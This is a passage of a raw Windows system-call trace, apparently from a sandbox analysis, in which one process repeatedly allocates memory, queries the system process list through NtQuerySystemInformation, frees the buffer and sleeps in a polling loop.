NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0161.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0161.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.760] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0161.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0161.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0161.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0161.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0161.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0161.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.972] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0161.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0161.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0161.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0161.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0161.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0162.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.159] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0162.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0162.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0162.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0162.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0162.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0162.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.562] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0162.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0162.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0162.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0162.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0162.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0162.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.739] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0162.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0162.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0162.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0162.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0162.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0163.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0163.090] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0163.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0163.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0163.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0163.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0163.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0163.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0163.255] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0163.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0163.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0163.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0163.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0163.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0163.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0163.371] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0163.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0163.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0163.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0163.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0163.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0163.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0163.484] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0163.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0163.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0163.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0163.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0163.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0163.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0163.599] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0163.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0163.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0163.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0163.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0163.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0163.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0163.737] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0163.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0163.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0163.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0163.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0163.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0163.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0163.844] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0163.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0163.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0163.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0163.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0163.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0163.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0163.961] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0163.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0163.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0163.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0163.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0163.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0164.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0164.094] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0164.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0164.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0164.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0164.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0164.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0164.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0164.318] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0164.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0164.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0164.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0164.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0164.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0164.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0164.562] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0164.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0164.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0164.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0164.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0164.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0164.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0164.688] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0164.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0164.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0164.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0164.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0164.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0164.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0164.825] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0164.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0164.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0164.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0164.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0164.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0165.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0165.177] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0165.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0165.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0165.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0165.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0165.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0165.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0165.306] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0165.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0165.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0165.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0165.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0165.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0165.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0165.433] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0165.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0165.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0165.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0165.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, 